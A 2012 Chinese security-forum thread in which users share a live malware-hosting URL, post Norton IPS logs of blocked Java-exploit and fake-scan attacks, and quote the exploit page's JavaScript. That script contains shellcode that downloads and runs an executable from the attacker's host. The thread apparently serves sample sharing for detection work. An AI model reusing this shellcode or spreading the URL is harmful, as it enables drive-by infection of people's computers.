要抓就快点，新鲜的

显示全部楼层 · 发表于 2012-12-18 13:24:02

dworddb.com/akThrY133st045q10eTsI0ta5x06e1A0I1tL0DpKo0ytTm109Aj0A3J704wvi0wSOS0BoCc0udb10sAqd/

样本截图什么的都在这里： http://bbs.kafan.cn/thread-1430677-1-1.html

显示全部楼层 · 发表于 2012-12-18 13:28:33

firefox阻挡。。

显示全部楼层 · 发表于 2012-12-18 15:42:15

本帖最后由 wjcharles 于 2012-12-18 15:46 编辑

NIS2013

ips:
类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明,类别
2012/12/18 15:33:37,高,阻止了 dworddb.com 的入侵企图,已阻止,不需要操作,Web Attack: Malicious Java Download 14,不需要操作,不需要操作,"dworddb.com (91.201.215.173, 80)",dworddb.com/akThrY133st045q10eTsI0ta5x06e1A0I1tL0DpKo0ytTm109Aj0A3J704wvi0wSOS0BoCc0udb10sAqd/arAlSIS.jar,"SSHSS-PC (98.31, 2612)",91.201.215.173 (91.201.215.173),"TCP, www-http",

浏览器漏洞防护：

类别：入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击者网址,类别
2012/12/18 15:34:03,高,阻止了一次入侵企图。,已阻止,不需要操作,Fake App Attack: Fake Scan Webpage 8,不需要操作,不需要操作,hxxp://dworddb.com/akThrY133st045q10eTsI0ta5x06e1A0I1tL0DpKo0ytTm109Aj0A3J704wvi0wSOS0BoCc0udb10sAqd/,

关闭ips的话，就浏览器漏洞防护拦截，java外联后进程被终止

显示全部楼层 · 发表于 2012-12-18 15:48:58

……

<script type="text/javascript">
url_var_param = "http://dworddb.com/gelo7O11uvs0AA9k08SBX0vicY03hOT0kltv0gPvi0Gvgm0gdSf0xabT14K2i0a0xu0VZhx0aE650UncV0LctL07eQU14OvW0TVXj0C71E0IM2o04QWQ111qp0htEA0kxrm0GfJZ0tUOh0Q8Qn0diJ20matJ13Wc111Qvs/getmyfile.exe?o=1"+"&h=21";
function my_shell(s){
shellcode_var = "E8000000005D83ED0531C9648B71308B760C8B761C8B46088B7E208B3666394F1875F2BED200000001EEBFBE0000000"+"1EFE86301000089EA81C2D"+"2000000526880000000FF95B"+"E00000089EA81C2D200000"+"031F601C28A9"+"C35E301000080FB007406881C3246EBEEC604320089EA81C2C501000052FF95C200000089EA81C2D00100005250FF95C60000006A006A0089EA81C2D20000005289EA81C2EF010000526A00FFD06A0589EA81C2D200000052FF95CA0000006A00FF95CE000000000000000000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E45786563004578697450726F6365737300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B59B01000066AD03859B0100008B707883C61C03B59B0100008DBD9F010000AD03859B010000ABAD03859B01000050ABAD03859B010000AB5E31DBAD5603859B01000089C689D751FCF3A65974045E43EBE95E93D1E00385A701000031F69666ADC1E00203859F01000089C6AD03859B010000C3EB100000000000000000000000000000000089859B0100005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C654100537663686F73742E65786500";
for ( i_var =0; i_var < url_var_param.length; i_var+=1) {
sym_var = url_var_param.charCodeAt(i_var).toString(16);
if (sym_var.length == 1) sym_var = "0" + sym_var;
shellcode_var += sym_var;
}
shellcode_var += "00";
return shellcode_var;
}
</script>

复制代码

表示上面那个是迷惑的吧？下面那个才是真爱！

显示全部楼层 · 发表于 2012-12-18 15:52:10

wjhstu-VxG 发表于 2012-12-18 15:48
……表示上面那个是迷惑的吧？下面那个才是真爱！

老大，没事，求别召唤

忙着类

显示全部楼层 · 发表于 2012-12-18 16:05:23

再详细点吧，原网址/pdfx.html，然后继续嵌套了个/flsh.html，然后是上面的内容

显示全部楼层 · 发表于 2012-12-18 16:07:51

firefox3 发表于 2012-12-18 15:52
老大，没事，求别召唤忙着类

额……我要回复怎么办？

显示全部楼层 · 发表于 2012-12-18 16:21:23

wjhstu-VxG 发表于 2012-12-18 16:07
额……我要回复怎么办？

最后一次回复

[未鉴定] 要抓就快点，新鲜的

评分

评分